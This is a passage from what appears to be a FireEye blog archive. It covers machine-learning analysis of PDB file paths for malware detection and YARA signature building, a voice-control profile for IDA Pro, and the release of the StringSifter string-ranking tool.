C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.
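
A minimal sketch of such normalization using regular expressions – these heuristics are assumptions for illustration, not our production rules, and detecting randomly generated directory names (for <random>) would require additional logic such as an entropy threshold:

import re

def normalize_path(path):
    p = path.lower()
    # Replace user profile directories with a placeholder token.
    p = re.sub(r"(\\users\\)[^\\]+", r"\g<1><username>", p)
    p = re.sub(r"(\\documents and settings\\)[^\\]+", r"\g<1><username>", p)
    # Replace dotted, version-like directory names, e.g. "\1.2.3\".
    p = re.sub(r"\\v?\d+(\.\d+)+(?=\\)", r"\\<version>", p)
    return p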

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations: directories such as “Desktop” were somewhat more likely to appear in malicious paths, while the use of shared drives such as Z: was more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions, and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.


Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]
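
The three schemes are easy to sketch in a few lines of Python (a simplified illustration that lowercases terms and treats the filename stem as a final token, matching the examples above):

def tokenize(path):
    # "c:\Leave\smell\Long\ruleThis.pdb" -> ['c:', 'leave', 'smell', 'long', 'rulethis']
    return path.lower().rsplit(".pdb", 1)[0].split("\\")

def bag_of_words(path):
    return tokenize(path)

def positional(path):
    # Drop the drive, then suffix each term with its distance from the drive.
    return ["%s_%d" % (term, i) for i, term in enumerate(tokenize(path)[1:], start=1)]

def ngrams(path, n=2):
    parts = tokenize(path)
    return ["\\".join(parts[i:i + n]) for i in range(len(parts) - n + 1)]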

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files     Correlated with Benign Files
users, desktop                      src, retail
documents, visual studio 2012       obj, x64
local, temporary projects           src, x86
users, projects                     src, win32
users, documents                    retail, dynamic
appdata, temporary projects         src, amd64
users, x86                          src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths gave us a vocabulary of nearly 70,000 distinct terms. The vast majority of these terms occurred only once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.


Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous number of terms that may only appear a handful of times. One simple way to solve this problem without losing much information is to cut off the keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files) and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.


Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.
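
A minimal sketch of this featurization, assuming the bag-of-words tokens from the previous section and the roughly 230-term cutoff described above:

from collections import Counter

def one_hot_features(tokenized_paths, top_k=230):
    # Keep the top_k most common directory terms as the vocabulary, then
    # one-hot encode each path by the presence of each vocabulary term.
    counts = Counter(term for toks in tokenized_paths for term in set(toks))
    vocab = [term for term, _ in counts.most_common(top_k)]
    rows = [[int(term in set(toks)) for term in vocab] for toks in tokenized_paths]
    return rows, vocab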

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, setting a couple of hyperparameters such as max depth and minimum samples per leaf. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.


Figure 6: Example decision tree and decision paths
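
In scikit-learn terms, this loop takes only a few lines; the hyperparameter values and variable names below are illustrative, and export_text is one convenient way to dump the boolean branches that can then be translated into YARA logic:

from sklearn.tree import DecisionTreeClassifier, export_text

# X_train: one-hot keyword matches plus statistical features; y_train: labels.
clf = DecisionTreeClassifier(max_depth=6, min_samples_leaf=50)
clf.fit(X_train, y_train)

# Print human-readable decision paths as candidate signature logic.
print(export_text(clf, feature_names=feature_names))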

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term            Example Hashes
\poe\                     a6b2aa2b489fb481c3cd9eab2f4f4f5c
                          92904dc99938352525492cd5133b9917
                          444be936b44cc6bd0cd5d0c88268fa77
\xampp\                   4d093061c172b32bf8bef03ac44515ae
                          4e6c2d60873f644ef5e06a17d85ec777
                          52d2a08223d0b5cc300f067219021c90
\temporary projects\      a785bd1eb2a8495a93a2f348c9a8ca67
                          c43c79812d49ca0f3b4da5aca3745090
                          e540076f48d7069bacb6d607f2d389d9
\stub\                    5ea538dfc64e28ad8c4063573a46800c
                          adf27ce5e67d770321daf90be6f4d895
                          c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful: 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes intuitive sense when hunting for malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.
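
The evaluation itself can be sketched with scikit-learn’s cross-validation utilities (the estimator settings and variable names here are illustrative, not our exact tuning):

from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_validate

rf = RandomForestClassifier(n_estimators=200)
scores = cross_validate(rf, X, y, cv=10,
                        scoring=("accuracy", "recall", "precision"))
# Average each metric over the 10 cross-validation folds.
print({name: vals.mean() for name, vals in scores.items() if name.startswith("test_")})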

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

  1. We developed several file path feature functions which are transferable to other models under development.
  2. By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
  3. We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

3 October 2019 at 17:00

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to put their reverse engineering skills to use through this new accessibility option, while also helping the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

VoiceAttack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process, after which the network adapter can be disabled or configured to a network that cannot reach the internet without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process takes as little as a few minutes, but the more time you spend training, the better your experience will be.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the GitHub page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!


Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.


Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.
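
As a flavor of what such a helper might look like – this is a hypothetical IDAPython sketch, not the plugin’s actual code, and the mnemonic check is x86-specific – consider a command that jumps to the next call instruction:

import idaapi
import idc

def goto_next_call():
    # Walk forward from the cursor and jump to the next call instruction.
    ea = idc.next_head(idc.here())
    while ea != idaapi.BADADDR:
        if idc.print_insn_mnem(ea) == "call":
            idc.jumpto(ea)
            return
        ea = idc.next_head(ea)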

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name.

Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that together enable full voice control of IDA Pro along with many added convenience features. The profile contains over 1,000 defined commands, and it is growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s GitHub page. Give it a try today!

Open Sourcing StringSifter

7 September 2019 at 17:00

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings, which can quickly induce analyst fatigue; relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, to incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.
